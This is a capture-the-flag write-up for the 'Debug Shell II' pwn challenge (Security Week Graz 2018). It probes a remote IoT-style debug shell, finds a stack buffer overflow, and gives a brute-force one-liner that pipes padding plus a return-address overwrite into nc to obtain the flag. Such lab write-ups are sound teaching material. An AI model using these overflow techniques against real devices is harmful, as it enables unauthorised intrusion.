Debug Shell II
[Security Week Graz, 2018]
- Category: pwn
- Points: 80
- Description:
This is another interesting debug interface I've found on an IoT device. Again, I want to have more!
This time, no binary, but this shouldn't stop you, right?
Connect to 8004
to get your real flag.
Okay, no binary, so let's just connect to the given port and see what it gives us:
user@host$ nc 8004
$> help
quit - exit the shell
shell - spawn shell
print <text> - echo the given text
check - dump firmware for self check
Nice, there's some shell
$> shell
Sorry, shell is only enabled in debug build (0x216e7770)
Unlucky us, but what is 0x216e7770
, turning that in a string bytewise is !nwp
, which is pwn!
Makes, sense. we need to pwn this challenge!
Next, what do other commands give us:
$> print
(null)$> print %x
$> print hi
$> check
/* some skipped binary gibberish*/
$> quit
Okay, so there's no format string attack possible... check
gives us the firmware image. let's fetch it and start reversing the returned blob with cutter or radare!
But first, let's run a 101 buffer overflow check:
$> print aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Strange, is there an overflow causing the crash? Let's find out how large the buffer is:
user@host$ nc 8004
$> print aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
$> print aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
$> print aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Could have been automated, but for such short tryings, who cares. So what happens here?
Probably the last a overwrites some address on the stack and therefore kills executions. return addresses are placed on the stack too. So to put the address from the shell
call on the stack we would need to add pwn!
We again try bruteforcing before actually caring about disassembling the blob:
user@host$ for i in $(seq 1 16); do python -c "print 69*'a'+$i*'a'+'pwn!'+'\nquit'" | nc 8004; done
$> $> Bye!
$> $> $> $> $> $> $> $> $> $> {I_L1K3_ASCII_ADDR3SS3S!}
$> $> $> $> $> user@host$
So, here we go, simple buffer overflow and a nice set function at 0x216e7770
, no real reversing needed! nice!